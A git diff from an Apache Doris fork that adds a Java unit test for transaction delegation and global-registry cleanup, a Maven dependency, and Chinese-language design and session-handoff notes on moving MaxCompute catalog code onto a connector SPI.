When a connector supplies a real SPI {@link ConnectorTransaction}, the + * fe-core {@link Transaction} write callbacks ({@code addCommitData} / + * {@code supportsWriteBlockAllocation} / {@code allocateWriteBlockRange} / + * {@code getUpdateCnt}) must delegate to it, so that the generic write + * orchestration (which after W3 only sees the polymorphic {@link Transaction}) + * reaches the connector. The legacy no-op marker (no connector transaction) + * must keep inheriting the inert interface defaults.

+ */ +public class PluginDrivenTransactionManagerTest { + + /** Hand-written {@link ConnectorTransaction} test double recording delegated calls. */ + private static final class RecordingConnectorTransaction implements ConnectorTransaction { + private final long txnId; + private final List commitFragments = new ArrayList<>(); + private boolean supportsBlockAllocation; + private long blockRangeStart; + private String lastWriteSessionId; + private long lastCount; + private long updateCnt; + private boolean failOnCommit; + + private RecordingConnectorTransaction(long txnId) { + this.txnId = txnId; + } + + @Override + public long getTransactionId() { + return txnId; + } + + @Override + public void commit() { + if (failOnCommit) { + throw new RuntimeException("connector commit failed"); + } + } + + @Override + public void rollback() { + } + + @Override + public void close() { + } + + @Override + public void addCommitData(byte[] commitFragment) { + commitFragments.add(commitFragment); + } + + @Override + public boolean supportsWriteBlockAllocation() { + return supportsBlockAllocation; + } + + @Override + public long allocateWriteBlockRange(String writeSessionId, long count) { + this.lastWriteSessionId = writeSessionId; + this.lastCount = count; + return blockRangeStart; + } + + @Override + public long getUpdateCnt() { + return updateCnt; + } + } + + @Test + public void addCommitDataIsDelegatedToConnectorTransaction() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + RecordingConnectorTransaction connectorTx = new RecordingConnectorTransaction(777L); + long txnId = manager.begin(connectorTx); + + byte[] fragment = {1, 2, 3}; + manager.getTransaction(txnId).addCommitData(fragment); + + Assert.assertEquals(1, connectorTx.commitFragments.size()); + Assert.assertSame(fragment, connectorTx.commitFragments.get(0)); + } + + @Test + public void supportsWriteBlockAllocationIsDelegated() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + RecordingConnectorTransaction connectorTx = new RecordingConnectorTransaction(778L); + connectorTx.supportsBlockAllocation = true; + long txnId = manager.begin(connectorTx); + + Assert.assertTrue(manager.getTransaction(txnId).supportsWriteBlockAllocation()); + } + + @Test + public void allocateWriteBlockRangeIsDelegated() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + RecordingConnectorTransaction connectorTx = new RecordingConnectorTransaction(779L); + connectorTx.blockRangeStart = 100L; + long txnId = manager.begin(connectorTx); + + long start = manager.getTransaction(txnId).allocateWriteBlockRange("write-session-x", 5L); + + Assert.assertEquals(100L, start); + Assert.assertEquals("write-session-x", connectorTx.lastWriteSessionId); + Assert.assertEquals(5L, connectorTx.lastCount); + } + + @Test + public void getUpdateCntIsDelegated() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + RecordingConnectorTransaction connectorTx = new RecordingConnectorTransaction(780L); + connectorTx.updateCnt = 42L; + long txnId = manager.begin(connectorTx); + + Assert.assertEquals(42L, manager.getTransaction(txnId).getUpdateCnt()); + } + + @Test + public void legacyMarkerKeepsInertWriteDefaults() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + long txnId = manager.begin(); + Transaction txn = manager.getTransaction(txnId); + + // The legacy no-op marker (null connector transaction) must stay inert, + // matching the interface defaults: addCommitData is a silent no-op, + // block allocation is unsupported, and the update count is zero. + txn.addCommitData(new byte[] {9}); + Assert.assertFalse(txn.supportsWriteBlockAllocation()); + Assert.assertEquals(0L, txn.getUpdateCnt()); + try { + txn.allocateWriteBlockRange("none", 1L); + Assert.fail("expected UnsupportedOperationException for the legacy marker"); + } catch (UnsupportedOperationException expected) { + // legacy marker does not support write block allocation + } + } + + // ──────────── global registration (P4-T06a W-d / gap G3) ──────────── + // + // begin(ConnectorTransaction) must also register the txn in the process-wide + // GlobalExternalTransactionInfoMgr, because the BE block-allocation RPC and the + // commit-data feedback look it up there by id (FrontendServiceImpl + // .getMaxComputeBlockIdRange -> getTxnById). Without it those callbacks throw + // "Can't find txn". commit/rollback must deregister so the registry cannot leak. + // (Distinct ids 90001+ avoid colliding with the delegation tests above, which + // intentionally never commit and therefore leave their ids registered.) + + @Test + public void beginRegistersConnectorTransactionInGlobalRegistry() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + long txnId = manager.begin(new RecordingConnectorTransaction(90001L)); + try { + Transaction registered = + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId); + Assert.assertSame("global registry must hold the same wrapped transaction the " + + "manager hands out", manager.getTransaction(txnId), registered); + } finally { + // do not leak the id into the shared global registry + manager.commit(txnId); + } + } + + @Test + public void commitDeregistersFromGlobalRegistry() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + long txnId = manager.begin(new RecordingConnectorTransaction(90002L)); + + manager.commit(txnId); + + assertNotRegistered(txnId); + } + + @Test + public void rollbackDeregistersFromGlobalRegistry() throws UserException { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + long txnId = manager.begin(new RecordingConnectorTransaction(90003L)); + + manager.rollback(txnId); + + assertNotRegistered(txnId); + } + + @Test + public void commitStillDeregistersWhenConnectorCommitThrows() { + PluginDrivenTransactionManager manager = new PluginDrivenTransactionManager(); + RecordingConnectorTransaction connectorTx = new RecordingConnectorTransaction(90004L); + connectorTx.failOnCommit = true; + long txnId = manager.begin(connectorTx); + + try { + manager.commit(txnId); + Assert.fail("commit must propagate the connector failure"); + } catch (Exception expected) { + // the connector's commit failure propagates to the caller + } + + // commit() wraps deregistration in try/finally, so a failed connector commit must + // not leave a stale entry behind (mirrors rollback()). + assertNotRegistered(txnId); + } + + private static void assertNotRegistered(long txnId) { + try { + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().getTxnById(txnId); + Assert.fail("txn " + txnId + " should have been deregistered from the global registry"); + } catch (RuntimeException expected) { + // getTxnById throws "Can't find txn for " once the entry is gone + } + } +} diff --git a/fe/pom.xml b/fe/pom.xml index 73c055dfa37778..8b65673e1d5fb1 100644 --- a/fe/pom.xml +++ b/fe/pom.xml @@ -266,6 +266,7 @@ under the License. 1.6.0 2.11.0 1.13 + 2.6 3.19.0 3.13.0 2.2 @@ -861,6 +862,13 @@ under the License. commons-codec ${commons-codec.version}
+ + + commons-lang + commons-lang + ${commons-lang.version} + org.apache.commons diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index b9d43605c3ca1c..473e2a7df9e918 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -99,6 +99,7 @@ fe-connector-api/src/main/java/org/apache/doris/connector/api/ | E8 | `ConnectorColumnStatistics` | `ConnectorStatisticsOps.setColumnStatistics(...)` | | E9 | `ConnectorWriteType.DELETE` / `MERGE_DELETE` / `MERGE_INSERT` 三个新枚举值 | `ConnectorWriteOps.getDeleteConfig / getMergeConfig` | | E10 | — | `ConnectorTableOps.listPartitionNames` + `listPartitions(handle, filter)` | +| E11 | `ConnectorWritePlanProvider`、`ConnectorSinkPlan`、`ConnectorWriteHandle`(写包)| `Connector.getWritePlanProvider()`、`ConnectorTransaction.addCommitData / supportsWriteBlockAllocation / allocateWriteBlockRange / getUpdateCnt`([D-022];详见 §20 + 写 RFC)| --- @@ -1246,3 +1247,22 @@ fi | `range` | 显式范围分区,初始值在 `initialValues` | Doris | 未列出的字符串视为 `CUSTOM`,由 connector 内部识别。 + +--- + +## 20. 扩展 E11:写/事务 SPI(写-plan-provider + ConnectorTransaction 写回调) + +> 后补节(2026-06-06),置于附录后以避免重排既有节号。完整设计见 [写/事务 SPI RFC](./tasks/designs/connector-write-spi-rfc.md)(§5 API / §8 fe-core 改动 / §12 W1→W7)。决策见 [D-022](./decisions-log.md)(A/B1/C1/D/E);W5 收口位置修正见 [DV-009](./deviations-log.md)。 + +把 fe-core 通用写编排(`Coordinator`/`LoadProcessor`/`FrontendServiceImpl`/`TransactionManager`)完全多态化,消除全部 `instanceof *Transaction` / concrete cast;定义连接器写/事务 SPI(maxcompute P4 / iceberg P6 / hive P7 实现,paimon P5 零 SPI 改动接入)。**保 BE 契约不变**。 + +**SPI 面(default-only,[D-009])**: +- `ConnectorTransaction`(既有,+4 default):`addCommitData(byte[])`(B1)、`supportsWriteBlockAllocation()` / `allocateWriteBlockRange(sid, count)`(C1)、`getUpdateCnt()`。fe-core `Transaction` 加同名 default;`PluginDrivenTransaction`(`PluginDrivenTransactionManager` 产)桥接委派(A)。 +- `ConnectorSession.allocateTransactionId()`(P4-T03 新增 default 抛;fe-core `ConnectorSessionImpl` override 回 `Env.getNextId`):为**无外部 id 的连接器**(如 maxcompute)提供引擎全局 txn id 分配器,连接器经它在 `beginTransaction` 分配,id 即 Doris `txn_id`(与 sink / `GlobalExternalTransactionInfoMgr` 一致)。细化 [D-015]/U3「连接器分配」,见 [D-024]。 +- **P4-T06 翻闸新增(2,default-preserving,零 jdbc/es/trino 影响;[D-026] 预授、登记 2026-06-07)**:`ConnectorSession.setCurrentTransaction(ConnectorTransaction)`(default 抛;fe-core `ConnectorSessionImpl` 加 volatile 字段 + override `getCurrentTransaction`)——把 connectorTx 绑入 **sink 的** session 供 T04 `planWrite` 读 `getCurrentTransaction()`(解 dormant→live 的 G1);`ConnectorWriteOps.usesConnectorTransaction()`(default false;`MaxComputeConnectorMetadata` override true)——executor 据此在调任何 throwing-default 写法前分流 txn-model(MC)vs JDBC insert-handle([D-026] D-1)。 +- `ConnectorWritePlanProvider.planWrite(session, handle) → ConnectorSinkPlan(TDataSink)`(E,仿 `ConnectorScanPlanProvider`);`Connector.getWritePlanProvider()` default null。`ConnectorWriteHandle` = {tableHandle, columns, overwrite, writeContext};`ConnectorSinkPlan` 包 opaque `TDataSink`。 +- DML 覆盖 INSERT / DELETE / MERGE(D);procedures defer(E2 / P6)。 + +**三处 seam**:B1 commit 载荷 opaque bytes(`TBinaryProtocol` 序列化,单点 `CommitDataSerializer`,连接器反序列化);C1 maxcompute block-id 窄 callback;E 写-plan-provider 产 opaque `TDataSink`。 + +**W-phase 落地**(behind gate、零行为变更、golden 等价):W1+W2(SPI 面 + `Transaction` 泛化)`be945476ba7`;W3+W6(解耦 3 热路径 + golden 测)`9ad2bbe40ec`;W4(`PluginDrivenTransaction` 委派)`759cc0874c8`;W5(`planWrite` layer 进 `visitPhysicalConnectorTableSink`,见 [DV-009])`9ebe5e27fa4`;W7(本节 + [D-021]/[D-022])。逐连接器 adopter(搬类 + impl 写 SPI + 翻闸)= P4 / P6 / P7。 diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 9bda3254c43b26..1bb74163a0d2c9 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -1,130 +1,375 @@ # 🤝 Session Handoff -> 这是**滚动文档**:每次 session 结束时覆盖更新;历史通过 `git log plan-doc/HANDOFF.md` 查看。 -> 新 session 开始时必读:[PROGRESS.md](./PROGRESS.md) → 本文件 → 对应 task 文件。 +> 滚动文档:每次 session 结束覆盖更新;历史见 `git log plan-doc/HANDOFF.md`。 > 协作规范:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md) --- -## 📅 最后一次 handoff +# 🔥 第 18 次 handoff(2026-06-09,覆盖)— PR #64119(MaxCompute test_connection 校验 + 外表/视图 read·write 拒绝)迁移 SPI DONE,连接器 UT 全绿 + +> **本 session**:用户要求把 upstream PR apache/doris#64119(`[fix](fe) Improve MaxCompute catalog validation`,11 文件/+422)的功能完整迁移到 SPI 框架,并跑通其 3 个单元测试。PR 改的 fe-core 类(`MaxComputeExternalCatalog`/`MaxComputeExternalTable`/`MCTransaction`/`MaxComputeScanNode`)在本 fork 已于 P4 删除→连接器化,故为真迁移。**用户定夺**:① 范围 = surgical(补 A + 加 C,B/D 已在不动);② 测试 = fold 进现有连接器测试文件。 + +## ✅ 本 session 已完成(4 main + 3 test,全门绿,本地未 commit) + +- **Gap 分析(关键发现)**:PR 4 行为里 **(B) REST 超时**(`MaxComputeDorisConnector.buildSettings` RestOptions)与 **(D) split_byte_size 报错文案**(`MaxComputeConnectorProvider:82` 已用 `SPLIT_BYTE_SIZE`,G6 已修)**早已在 fork**;**(A) test_connection 连通性校验**仅 stub(`testConnection()` 调 `odps.projects().exists()` 但**丢返回值**、**无 namespace-schema 分支**);**(C) 外表/逻辑视图 read+write 拒绝**完全缺失。→ 实际新工 = 补全 A + 实现 C。 +- **(A) 补全 `MaxComputeDorisConnector.testConnection()`**:加 `enableNamespaceSchema` 字段(doInit 赋值);改调 `validateMaxComputeConnection()`——`enableNamespaceSchema ?` schema 校验(`odps.schemas().iterator(project).hasNext()`) `:` project 校验(`odps.projects().exists(project)` **查返回值**);4 个 protected seam 镜像 PR 的 `MaxComputeExternalCatalog`。失败经 `ConnectorTestResult.failure(msg)`,由 `PluginDrivenExternalCatalog.checkWhenCreating`(已有 TEST_CONNECTION 闸 + testConnection wiring)包成 DdlException。MC 默认 test_connection=false(不 override `defaultTestConnection()`)。 +- **(C) 外表/视图拒绝**:`MaxComputeTableHandle.checkOperationSupported(...)`(实例 + 静态纯守卫,throw `DorisConnectorException("{Reading|Writing} MaxCompute external table or logical view is not supported: db.name")`),接入 `MaxComputeScanPlanProvider.planScan:187`("Reading",所有读路径汇入此 6-arg;4/5-arg + planScanForPartitionBatch 默认都委派至此)+ `MaxComputeWritePlanProvider.planWrite:92`("Writing",开 write session 前)。镜像 PR `isUnsupportedOdpsTable` + getSplits/beginInsert 守卫。 +- **测试(fold 进现有 3 文件 ↔ PR 3 测)**:`MaxComputeConnectorProviderTest` +6(D split-msg / MC default-off / 4×testConnection via `TestMaxComputeDorisConnector` seam 子类,offline 无 Mockito);`MaxComputeConnectorTransactionTest` +3(write reject ×2 + 负例);`MaxComputeScanPlanProviderTest` +3(read reject ×2 + 负例)。 +- **守门全绿**:`mvn -pl :fe-connector-maxcompute -am test` = **101 run / 0 fail / 0 err / 1 skip**(skip=OdpsLiveConnectivityTest 无 live env);**checkstyle 0 violations**;import-gate 净(仅加 connector-api + odps import,无 fe-core)。**mutation 验真**:`||`→`&&`(守卫) + `if(enableNamespaceSchema)` 取反(路由) → 精确 **8 红**(4 reject + 4 connectivity),还原后复绿。 + +## ✅ 追加(用户要求把 PR 3 个 groovy 回归测试也迁过来) +- **3 个 groovy 已迁**(`regression-test/suites/external_table_p2/maxcompute/`,皆 `p2,external` 活集成测,本地**无 live ODPS 无法跑**,仅结构核:三引号/花括号平衡、属性键与连接器 `MCConnectorProperties` 一致): + - 新增 `test_max_compute_validate_connection.groovy`(PR 原样,属性键全对得上 fork):4 catalog——default(无 test_connection)/explicit-false 用非法 endpoint `127.0.0.1:1` 应**建成功**(跳连通性);validate-project(test_connection=true) 应抛 `Failed to validate MaxCompute project`;validate-schema(+enable.namespace.schema) 应抛 `with namespace schema`。**断言子串与本 session (A) 实现的报错文案对齐**(经 `PluginDrivenExternalCatalog.checkWhenCreating` 包成 DdlException 后仍含该子串)。 + - 改 `test_external_catalog_maxcompute.groovy`:2 个 `${mc_db}` catalog 块加 `"test_connection"="true"`(replace_all 命中前 2 块;第 3 块 `other_mc_datalake_test` 不动 = 镜像 PR 仅 2 hunk)。 + - 改 `test_max_compute_schema.groovy`:namespace catalog 加 `"test_connection"="true"` + 补 EOF 换行(PR 同款)。 +- **fork odps SDK = 0.45.2-public**(upstream PR = 0.53.2);(A)/(C) 用的 API(`projects().exists`/`schemas().iterator`/`Table.isExternalTable·isVirtualView`)跨版本稳定、UT 已绿。 + +## ✅ 追加2 — (B) 裸 client 超时补全(用户定"补",DONE,门绿) +- 早期"(B) 已完成"判断**不准**:fork 只有 EnvironmentSettings/RestOptions 超时(`buildSettings`,仅 Storage API scan/write),**裸 odps client 超时缺失**——而 metadata/project/schema/testConnection 走的就是裸 client(`odps.getRestClient()`)。PR 的 (B) 正是在 `MaxComputeExternalCatalog.initLocalObjectsImpl` 设裸 client 超时。 +- **已补**:`MaxComputeDorisConnector.buildSettings` 内复用已解析的 3 个 int,加 `odps.getRestClient().setConnectTimeout/setReadTimeout/setRetryTimes`(零重复解析;0.45.2 API 已核存在)。故 `mc.connect_timeout/read_timeout/retry_count` 现作用于 metadata + 连通性调用。守门复跑 = **101/0/0/1 + checkstyle 0**,offline (A) 测不受影响(只 set 字段不联网)。 -- **日期 / 时间**:2026-06-05 -- **本 session 主题**:**P3 批 D 完成(T08,design-only)**——`tableFormatType` 分流消费设计备忘 + **[D-020]**(用户签字 M2=方案 B per-table SPI provider)。**P3 hybrid in-scope(批 A–D)全部完成**;剩批 E(live cutover)并入 P7。**P3 PR [#64143](https://github.com/apache/doris/pull/64143) 已开**(base branch-catalog-spi)。 -- **分支**:`catalog-spi-04`(P3 工作分支,基于 `branch-catalog-spi`)。工作树预期 clean(仅本地未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.bak`;**`plan-doc/research/` 本 session 已纳入 git 跟踪**)。 +## 🎯 下一步(用户定) +- **10 文件 working tree 未 commit**(4 main + 3 UT + 3 groovy);push/PR 由用户定。 +- **`fe/pom.xml`**:PR 仅改 tea 依赖注释(非功能、且 fork fe-core 已 odps-free),无须迁。 +- **plan-doc 仅更本 HANDOFF**;PROGRESS/decisions/task-list 未动(本工为用户 ad-hoc PR 迁移、非 P-task;如需正式 ADR/进度同步可补)。 + +## ⚙️ 操作须知(复用 + 本 session 坑) +- 连接器测试模块**无 Mockito**(仅 junit-jupiter,纯 seam 直测)——迁 fe-core Mockito 测须改写:连接器校验类用 **protected-seam 子类覆盖**(连 ctx 可传 null、odps client 离线构造 AK/SK 不联网),表型 reject 用**纯静态守卫直测**(见 [[catalog-spi-fe-core-test-infra]])。 +- maven 绝对 `-f .../fe/pom.xml -pl :fe-connector-maxcompute -am test [-Dtest=X] -Dmaven.build.cache.enabled=false`;**必带 -am**;读真实 `Tests run:`/`BUILD`,勿信后台 echo exit。 +- 分支 `catalog-spi-06`。未跟踪 `.audit-scratch/`(本 session 测试 log)/`conf.cmy/`/`*.bak`/`scheduled_tasks.lock`(勿提交)。 --- -## ✅ 本 session 完成项 +
📅 历史:第 17 次 handoff(2026-06-09)— 老 MaxCompute 代码移除 DONE(3 commit,全门绿) + +# 🔥 第 17 次 handoff(2026-06-09,覆盖)— 🎉 老 MaxCompute 代码移除 DONE(3 commit,全门绿) + +> **本 session**:用户确认 🅰 live ODPS e2e 绿后执行 Batch-D 删除。**基于最新 upstream `9ed49571b20`(#64253) 新建分支 `catalog-spi-06`**(upstream 已含全部 cutover+gap-fix 代码,与旧 `catalog-spi-05` tree 字节一致,已核:`git diff` 0 文件差)。**2 code commit + 1 doc commit,全部守门绿。** -| Task | 结果 | commits | -|---|---|---| -| **P3-T08** tableFormatType 分流消费设计备忘 | ✅ design-only(零代码);产出设计备忘 + [D-020](M2=方案 B);核心拆解 M1⊥M2 | 本 doc commit | +## ✅ 本 session 已完成 +- **删 legacy(`7a4db351100`)**:删 20 fe-core 文件(`datasource/maxcompute/*` 含 MCTransaction/MaxComputeScanNode|Split + 写/事务 plumbing + 2 测);清 21 反向引用文件(删 import + 死 instanceof/visitor/rule 分支,**保留**全部 PluginDriven/connector 兄弟分支 + §3 KEEP 集枚举/GsonUtils 串/block-id thrift);3 测 trim/rewire——**FrontendServiceImplTest** block-id RPC 测改用 generic `Transaction` mock(`getMaxComputeBlockIdRange` 现读 `PluginDrivenTransaction`,非 MCTransaction);**ExternalMetaCacheRouteResolverTest** 删 legacy `max_compute` engine 断言(插件路经 `ENGINE_DEFAULT`,已核 resolver fallback);**CommitDataSerializerTest** 删 MCTransaction 等价测。守门:test-compile(main+test) + checkstyle **0** + import-gate + grep-empty(`com.aliyun.odps` fe-core/src=∅、无非注释 code ref;`MaxComputeExternal|MCTransaction|MCInsert` 仅剩 GsonUtils 串 + 注释)全绿。 +- **依赖树彻底无 odps(`409300a75b8`,落实用户 Q2)**:删 fe-core/pom 两 odps 块;MCUtils 下沉 fe-common→be-java-extensions(`org.apache.doris.maxcompute`,删 legacy 后唯一消费者),JNI scanner/writer 删同包 import,MCProperties(odps-free 常量)留 fe-common;删 fe-common/pom 的 odps-sdk-core。**⚠️ 发现(DV-022)**:odps-sdk-core 此前**传递**给 fe-common 自身 `DorisHttpException`(netty)/`GsonUtilsBase`(protobuf)——删后编译暴露,fe-common 显式补 `netty-all`+`protobuf-java`。验收 `mvn -pl :fe-core dependency:tree | grep odps`=∅;fe-common+be-java-ext(max-compute)+fe-core 全编译。 +- **doc commit**:PROGRESS(P4 80%/maxcompute kanban 95%)+ deviations(DV-021 T3 四接受项 / DV-022 netty-protobuf)+ Batch-D 设计 §5「✅ EXECUTED」+ 本 HANDOFF。 -**净产出** = 设计备忘 `designs/P3-T08-tableformat-dispatch-design.md` + 决策 D-020 + 把上 session 的 recon 研究文件纳入跟踪。**P3 hybrid 全部 in-scope(批 A–D)完成**:2 正确性修(T02/T05)+ 2 fail-loud/决策(T04/T06)+ 测试网零→59 测(T07)+ 模型 dispatch 设计(T08/D-020)。 +## 🎯 下一步 +- **删除已完成**;剩 **push/PR**(用户定)。🅰 live e2e 用户已确认绿(本 session 解锁前提);静态分发审计(任务0 `reviews/P4-cutover-completeness-audit-2026-06-08.md` PASS)+ UT 层守门均绿。 +- 若日后要「fe-core 零 maxcompute 词元」= 另起 full-purge(泛化 block-id thrift / MC 枚举 / session var),用户当前**不取**(设计 §7.2 已评估升级兼容下限:GsonUtils 3 兼容串 + InitCatalogLog.Type.MAX_COMPUTE + 已持久化 TransactionType.MAXCOMPUTE 须留)。 -**commit stack**(新→旧):本 doc commit→`76586b2`(批 C handoff)→`435065f`(T07 feat)→`04f6576`(批 B handoff)→`10b72d4`(T05)→`301fe38`(批 A handoff)→`2758cf9`(T04 doc)→`feceabb`(T04)→`517c9cf`(T03 defer)→`ac0dc7c`(T02 doc)→`95f23e9`(T02)→`9fcf21a`(recon/D-019)→`0793f03`(P2)→`2b1a3bb`(P1)→`72d6d01`(P0)。 +## ⚙️ 操作须知 +- 分支 `catalog-spi-06`(off upstream/branch-catalog-spi,tracking 已设);本地 3 commit 未 push。未跟踪 `.audit-scratch/`/`conf.cmy/`/`*.bak`/`scheduled_tasks.lock`(勿提交)。 +- **删多模块 dep 时核传递依赖**(DV-022 教训:模块自身代码可能白拿被删 dep 的传递 jar,删前 `dependency:tree` + 删后编译验)。maven 绝对 `-f fe/pom.xml -pl : -am`,读真实 BUILD([[doris-build-verify-gotchas]])。 + +
--- -## 🚧 未完成 / 待办(下一 session:三选一,待用户定) +
📅 历史:第 16 次 handoff(2026-06-09)— Batch-D 移除方案 finalize(design-only) + +# 🔥 第 16 次 handoff(2026-06-09,覆盖)— Batch-D 移除方案 finalize + @HEAD 校验(design-only) -**P3 hybrid in-scope(批 A–D)已全部完成,PR #64143 已开。** 没有"批 D 之后的批"——批 E 是 deferred、并入 P7。下一 session: +> **本 session 主题**:用户要求「完整移除 fe-core 下老的 maxcompute(零代码 + 零依赖)」。本 session **只分析 + finalize 方案 + 查前置,不动代码**(用户定:实际删除放下个 session)。**结论**:移除方案 = 既有 **Batch-D**(`tasks/designs/P4-batchD-maxcompute-removal-design.md`,本 session 已 @HEAD 校验 + finalize + 扩 §7/§8);唯一硬门 = 🅰 用户 live e2e。 -1. **监控 [PR #64143](https://github.com/apache/doris/pull/64143)**:base = `apache/doris:branch-catalog-spi`、head = `morningman:catalog-spi-04`,26 files +3065/−154、12 commits。盯 CI、处理 review comment(review 改动在本分支 `catalog-spi-04` 续 commit + push 即自动进 PR)。前序 P0/P1/P2 PR 均 **squash-merge**。 -2. **批 E 并入 P7**(不在 P3 编码):live cutover——见下「批 E backlog」。属 hive/HMS migration(P7 或专门子阶段),不在本 PR 内。 -3. **启 P4**(maxcompute):若 P3 告一段落,按 master plan 进下一连接器。 +## ✅ 本 session 已完成(design-only,0 代码) +- **完整分析**(3 轴,多 Agent + 亲核):① 翻闸状态——`max_compute` 已全走 SPI(`CatalogFactory.SPI_READY_TYPES`),legacy 运行时零可达,2026-06-07 评审的写/分区/DDL blocker 已全在代码修复;② fe-core footprint——20 删除文件 + ~84 反向引用(§2);③ maven——fe-core 直接 odps 仅 `pom.xml:364/379`,余经 fe-common 传递。 +- **Batch-D @HEAD 校验**(全过):20 文件全在;**linchpin** = fe-core 内 8 个 import odps 文件全在删除单元、单元外 residual=∅(pom drop 编译安全);近 commit `effd8edbfdb`/`2b8a732682c` 只动 `PluginDrivenScanNode`(KEEP 集),footprint 未变;**任务 0 静态分发审计已 DONE**(`reviews/P4-cutover-completeness-audit-2026-06-08.md` PASS,零 legacy 回退)。 +- **finalize Batch-D design**:① 删除集计数 **21→20** 就地修正;② §1 红线补 **LIMIT-split 第 3 行为副本**(等价物 P3-9 / `MaxComputeScanPlanProvider` `952b08e0cc8`)= 原 DOC task 交付;③ 新增 **§7**(范围定夺 + @HEAD 校验 + 前置门 + 验收基线)+ **§8**(fe-common odps 解耦方案 A)。 -> ⚠️ 三选项**都不应**在 P3 分支内碰 `SPI_READY_TYPES` / fe-core 消费实现 / legacy `datasource/hudi/` / 非 hudi 连接器——皆批 E。 +## 👤 用户定夺(2026-06-09) +- **Q1 = 只删老实现(Batch-D),非 full-purge**:保留 live SPI 插件路径在用的 `max_compute` 胶水词元(§3 KEEP 集)。 +- **Q2 = fe-core 依赖树彻底无 odps(升级,覆盖 [D-027] 决定2)**:经**方案 A**——把唯一用 odps 的 `MCUtils` 下沉到 be-java-extensions(其删 legacy 后唯一消费者)、`MCProperties`(odps-free 常量)留 fe-common、删 `fe-common/pom.xml` 的 odps。故不再「接受 fe-common 传递 odps」。详见 design §8。 +- **后果(by design)**:删后 `grep com.aliyun.odps fe-core/src`=∅ **且** `dependency:tree|grep odps`=∅;但 `grep maxcompute|max_compute|odps fe-core/src/main` 仍 >0(703→低百,SPI 胶水保留,非缺陷)。真正零词元 = 另起 full-purge(用户当前不取)。 -### 批 E backlog(登记,不在 P3 编码;T08/D-020 已为其出设计) -- **M1**(T08 设计):fe-core `PluginDrivenExternalTable` 消费 `tableFormatType`——`PluginDrivenSchemaCacheValue` 缓存格式 + `getEngine/getEngineTableTypeName` per-table 化(opaque 串、热路径不读)。 -- **M2**(T08/D-020 设计):新增 default `ConnectorMetadata.getScanPlanProvider(handle)` + fe-core `PluginDrivenScanNode.getSplits` 优先 per-table 回落 per-catalog + hms 网关按 `handle.getTableType()` 委派。 -- T03 schema_id/history 完整 field-id evolution(DV-006) -- T05 `listPartitions*` override(DV-007);T06 完整 MVCC(DV-007);T04 完整 snapshot 透传 + 增量 SPI -- **T07 gap-2**:Hudi meta-field 纳入(`getTableAvroSchema()` 无参 vs legacy `(true)`)真实 fixture 实证(DV-008);gap-1 余项 `ThriftHmsClient` 源头防御降字(DV-008) -- T09–T11(模型落地/gate flip/删 legacy/集群验证);Iceberg-on-hms 经 SPI 依赖 **P6** 补 `IcebergScanPlanProvider`(M3);探测共享化消 drift(M5,P7) -- 端到端/集群验证(COW/MOR schema vs live legacy、BE JNI parse parity、混合多格式 catalog) +## 🎯 下一 session = 执行 Batch-D 删除(gated on 🅰 live e2e) +- **Runbook = design §5**(T07+T08+T09 + §2 edits 作 **one compiling unit** → 守门 test-compile+checkstyle+import-gate → grep-empty 验收 → commit → §4 fe-core pom drop **+ §8 fe-common 解耦** → doc-sync)。**执行前按符号 re-grep**(§2 行号已漂移 +5~+43)。 +- **前置门**: + 1. 🅰 **live ODPS e2e 绿(用户跑,硬门,OPEN)**:`OdpsLiveConnectivityTest`(4 个 `MC_*` env)+ 手测 smoke(读/写/DDL/元数据全覆盖)。[D-027]:删 legacy 前 flip 须保持独立可 revert。 + 2. ⬜ **T3**(登记 4 条 Tier-3 DV,doc-only,可同批)。 +- **验收基线**(§7.4):`MaxComputeExternal|MCTransaction|MCInsert` 151→仅 §3 KEEP;`com.aliyun.odps` fe-core/src→∅;`dependency:tree|grep odps`→**∅**(含 §8)。 + +## ⚙️ 操作须知(复用) +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`;读真实 `BUILD`/`Tests run:`,勿信后台 task exit code。改 fe-core=`:fe-core`、改 fe-common=`:fe-common`、改 BE 扩展=`be-java-extensions/max-compute-connector`。 +- 删除 + 反向引用须 **one compiling unit**(Java 不 dead-strip 源符号引用);§3 KEEP 集勿删(GsonUtils 3 字面量、block-id thrift、各 MC 枚举、PluginDriven*)。§8 移 MCUtils 须在删 `MaxComputeExternalCatalog` 之后(否则 fe-core 仍需 MCUtils)。 +- 分支 `catalog-spi-05`,本地未 push。本 session **0 代码 commit**(仅 plan-doc:design §1/§5/§7/§8 + HANDOFF + PROGRESS + tracker DOC✅)。未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.groovy.bak`(勿提交)。 + +## 🧠 给下一个 agent 的 meta +- **🅰 live e2e(真实 ODPS)仍是翻闸 + 删除的真正完成门**;静态分发面(任务 0)已绿。 +- 范围已定:Batch-D / **fe-core 依赖树彻底无 odps(方案 A 下沉 MCUtils)**,勿擅自扩成 full-purge、也勿退回 [D-027] 的「接受传递」。 +- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);FE 分发缺口史([[catalog-spi-cutover-fe-dispatch-gap]],任务0已复核 PASS);构建坑([[doris-build-verify-gotchas]])。 + +
--- -## ⚠️ 关键认知 / 临时发现 +
